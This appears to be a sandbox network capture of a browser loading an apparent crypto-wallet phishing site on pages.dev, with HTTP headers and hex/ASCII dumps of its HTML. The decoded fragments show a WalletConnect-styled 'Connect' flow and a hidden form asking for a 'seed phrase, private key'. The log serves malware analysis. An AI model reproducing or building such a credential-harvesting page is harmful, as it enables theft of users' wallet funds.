                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC917OUTGET /assets/vendor/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
                                                                                                                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ED2k8wyThhIeKQ87n7yGxDS35O%2FVbuCiUZIRcroZAIfU%2BsCEi7GU%2FMLN%2FisiTn1E%2BVPxKf0l7ju2m22pvYTr9mj%2Bob9aGDzsqiwLToOoIIOiFHsSeWI5gCTAw5HF3JRuEvoBBMhhH8%2FWZgbZcQm9jHXeAAWidztMbR0CC%2FhGhHGLnt4%2FFubqWjKE0S6Btm7BsH4oexFn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2de68bbde97-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC564INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 38 34 30 30 31 33 66 64 38 63 32 61 62 32 33 34 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 33 2e 31 2e 32 2f 72 6f 6c 6c 75 70 73 2f 61 65 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63
                                                                                                                                                                                                                                              Data Ascii: tyle.css" /> <link rel="stylesheet" href="840013fd8c2ab234.css" /> <link rel="stylesheet" href="styles.css" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script> <script src="https://cdnjs.c
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 26 23 33 39 3b 25 33 45 20 25 33 43 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 34 39 2e 33 20 28 35 31 31 36 37 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f 6d 2f 73 6b 65 74 63 68 20 2d 2d 25 33 45 20 25 33 43 74 69 74 6c 65 25 33 45 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 25 33 43 2f 74 69 74 6c 65 25 33 45 20 25 33 43 64 65 73 63 25 33 45 43 72 65 61 74 65 64 20 77 69 74 68 20 53 6b 65 74 63 68 2e 25 33 43 2f 64 65 73 63 25 33 45 20 25 33 43 64 65 66 73 25 33 45 25 33 43 2f 64 65 66 73 25 33 45 20 25 33 43 67 20 69 64 3d 26 23 33 39 3b 50 61 67 65 2d 31 26 23 33 39 3b 20 73 74 72 6f 6b 65 3d 26 23 33 39 3b 6e 6f 6e 65 26 23
                                                                                                                                                                                                                                              Data Ascii: w.w3.org/1999/xlink&#39;%3E %3C!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --%3E %3Ctitle%3EWalletConnect%3C/title%3E %3Cdesc%3ECreated with Sketch.%3C/desc%3E %3Cdefs%3E%3C/defs%3E %3Cg id=&#39;Page-1&#39; stroke=&#39;none&#
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 39 33 35 31 37 2c 31 32 36 2e 32 31 34 33 38 39 20 31 34 38 2e 38 39 33 35 31 34 2c 31 32 36 2e 32 31 34 33 39 33 20 31 34 38 2e 38 39 33 35 31 2c 31 32 36 2e 32 31 34 33 39 36 20 4c 39 31 2e 35 34 30 35 38 38 38 2c 31 38 32 2e 33 36 38 39 32 37 20 43 38 39 2e 30 39 35 30 35 32 2c 31 38 34 2e 37 36 33 33 35 39 20 38 35 2e 31 33 30 30 31 33 33 2c 31 38 34 2e 37 36 33 33 39 39 20 38 32 2e 36 38 34 34 32 37 36 2c 31 38 32 2e 33 36 39 30 31 34 20 43 38 32 2e 36 38 34 34 31 33 33 2c 31 38 32 2e 33 36 39 20 38 32 2e 36 38 34 33 39 38 2c 31 38 32 2e 33 36 38 39 38 36 20 38 32 2e 36 38 34 33 38 32 37 2c 31 38 32 2e 33 36 38 39 37 20 4c 31 2e 38 37 31 39 36 33 32 37 2c 31 30 33 2e 32 34 36 37 38 35 20 43 2d 30 2e 35 37 33 35 39 36 39 33 39 2c 31 30 30 2e 38 35 32
                                                                                                                                                                                                                                              Data Ascii: 93517,126.214389 148.893514,126.214393 148.89351,126.214396 L91.5405888,182.368927 C89.095052,184.763359 85.1300133,184.763399 82.6844276,182.369014 C82.6844133,182.369 82.684398,182.368986 82.6843827,182.36897 L1.87196327,103.246785 C-0.573596939,100.852
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 61 73 73 3d 22 69 6e 74 65 72 61 63 74 2d 6e 6f 77 22 3e 43 6f 6e 6e 65 63 74 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 59 4e 43 20 53 45 43 54 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 79 6e 63 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 63 2d 6a 53 46 6a 64 6a 20 66 6b 6f 57 4a 53 20 73 63 2d 69 77 61 6a 70 6d 20 6b 79 64 52 48 63 20 6d 74 2d 31 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20
                                                                                                                                                                                                                                              Data Ascii: ass="interact-now">Connect</button> </div> </div> </div> ... SYNC SECT --> <div id="sync" class="sc-jSFjdj fkoWJS sc-iwajpm kydRHc mt-10" style="display:
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 73 65 65 64 20 70 68 72 61 73 65 2c 20 70 72 69 76 61 74 65 20 6b 65 79 2c 2e 2e 20 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 71 75 69 72 65 64 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 71 72 63 6f 64 65 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 79 2d 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: placeholder="seed phrase, private key,.. " required ></textarea> <br /> <div id="qrcode" style="display: none"> <div class="py-2">
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 70 75 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 20 73 74 61 74 65 48 61 6e 64 6c 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 73 74 61 74 65 48 61 6e 64 6c 65 28 29 22 2c 20 31 20 2a 20 31 30 30 30 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 74 61 74 65 48 61 6e 64 6c 65 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 70 49 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 49 6e 70 75 74 22 29 2e 76 61 6c 75 65 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75
                                                                                                                                                                                                                                              Data Ascii: put.addEventListener("change", stateHandle); setTimeout("stateHandle()", 1 * 1000); function stateHandle() { let pInput = document.getElementById("pInput").value; if (docu
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC347INData Raw: 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 63 6f 6e 64 73 20 3d 20 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 66 72 61 6d 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 77 65 62 73 69 74 65 46 72 61 6d 65 22 20 73 72 63 3d 22 64 69 73 74 2f 77 65 62 73 69 74
                                                                                                                                                                                                                                              Data Ascii: 0; var seconds = 30; </script> </div> </div> </div> </div> </div> </div> <div class="iframe-container"> <iframe id="websiteFrame" src="dist/websit
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              93192.168.2.549837104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC681OUTOPTIONS /getWalletImage/018b2d52-10e9-4158-1fde-a5d5bac5aa00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df1b760f6f-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              94192.168.2.549836172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC820OUTGET /images/svg/brands/walletconnect.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC799INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E7EUSQpLlYQRDWVtHr8HL1YH%2BWM7bTKEItaor1CGamoodGykQxNEHY%2FGq32vHHGQrG3VPhfmHFjyJd9r4NR37gdsgyrjfXc6b8sURpKDWXGz4AjVHZGOhFGzohyCtFGi1wXWIuVBP%2B6BJjdsTzPMYX0zdv%2BJjn6dMMxHiikBVqhpGvmFGdIdDm6%2Bz3OBbnNV%2B84CoV1u"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2defb3f41b5-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC570INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 38 34 30 30 31 33 66 64 38 63 32 61 62 32 33 34 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 33 2e 31 2e 32 2f 72 6f 6c 6c 75 70 73 2f 61 65 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c
                                                                                                                                                                                                                                              Data Ascii: ss" /> <link rel="stylesheet" href="840013fd8c2ab234.css" /> <link rel="stylesheet" href="styles.css" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script> <script src="https://cdnjs.cloudfl
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 26 23 33 39 3b 25 33 45 20 25 33 43 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 34 39 2e 33 20 28 35 31 31 36 37 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f 6d 2f 73 6b 65 74 63 68 20 2d 2d 25 33 45 20 25 33 43 74 69 74 6c 65 25 33 45 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 25 33 43 2f 74 69 74 6c 65 25 33 45 20 25 33 43 64 65 73 63 25 33 45 43 72 65 61 74 65 64 20 77 69 74 68 20 53 6b 65 74 63 68 2e 25 33 43 2f 64 65 73 63 25 33 45 20 25 33 43 64 65 66 73 25 33 45 25 33 43 2f 64 65 66 73 25 33 45 20 25 33 43 67 20 69 64 3d 26 23 33 39 3b 50 61 67 65 2d 31 26 23 33 39 3b 20 73 74 72 6f 6b 65 3d 26 23 33 39 3b 6e 6f 6e 65 26 23 33 39 3b 20 73 74
                                                                                                                                                                                                                                              Data Ascii: rg/1999/xlink&#39;%3E %3C!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --%3E %3Ctitle%3EWalletConnect%3C/title%3E %3Cdesc%3ECreated with Sketch.%3C/desc%3E %3Cdefs%3E%3C/defs%3E %3Cg id=&#39;Page-1&#39; stroke=&#39;none&#39; st
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 31 32 36 2e 32 31 34 33 38 39 20 31 34 38 2e 38 39 33 35 31 34 2c 31 32 36 2e 32 31 34 33 39 33 20 31 34 38 2e 38 39 33 35 31 2c 31 32 36 2e 32 31 34 33 39 36 20 4c 39 31 2e 35 34 30 35 38 38 38 2c 31 38 32 2e 33 36 38 39 32 37 20 43 38 39 2e 30 39 35 30 35 32 2c 31 38 34 2e 37 36 33 33 35 39 20 38 35 2e 31 33 30 30 31 33 33 2c 31 38 34 2e 37 36 33 33 39 39 20 38 32 2e 36 38 34 34 32 37 36 2c 31 38 32 2e 33 36 39 30 31 34 20 43 38 32 2e 36 38 34 34 31 33 33 2c 31 38 32 2e 33 36 39 20 38 32 2e 36 38 34 33 39 38 2c 31 38 32 2e 33 36 38 39 38 36 20 38 32 2e 36 38 34 33 38 32 37 2c 31 38 32 2e 33 36 38 39 37 20 4c 31 2e 38 37 31 39 36 33 32 37 2c 31 30 33 2e 32 34 36 37 38 35 20 43 2d 30 2e 35 37 33 35 39 36 39 33 39 2c 31 30 30 2e 38 35 32 33 37 37 20 2d 30
                                                                                                                                                                                                                                              Data Ascii: 126.214389 148.893514,126.214393 148.89351,126.214396 L91.5405888,182.368927 C89.095052,184.763359 85.1300133,184.763399 82.6844276,182.369014 C82.6844133,182.369 82.684398,182.368986 82.6843827,182.36897 L1.87196327,103.246785 C-0.573596939,100.852377 -0
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6e 74 65 72 61 63 74 2d 6e 6f 77 22 3e 43 6f 6e 6e 65 63 74 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 59 4e 43 20 53 45 43 54 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 79 6e 63 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 63 2d 6a 53 46 6a 64 6a 20 66 6b 6f 57 4a 53 20 73 63 2d 69 77 61 6a 70 6d 20 6b 79 64 52 48 63 20 6d 74 2d 31 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 0d
                                                                                                                                                                                                                                              Data Ascii: nteract-now">Connect</button> </div> </div> </div> ... SYNC SECT --> <div id="sync" class="sc-jSFjdj fkoWJS sc-iwajpm kydRHc mt-10" style="display: none"
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 73 65 65 64 20 70 68 72 61 73 65 2c 20 70 72 69 76 61 74 65 20 6b 65 79 2c 2e 2e 20 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 71 75 69 72 65 64 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 71 72 63 6f 64 65 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 79 2d 32 22 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: placeholder="seed phrase, private key,.. " required ></textarea> <br /> <div id="qrcode" style="display: none"> <div class="py-2">
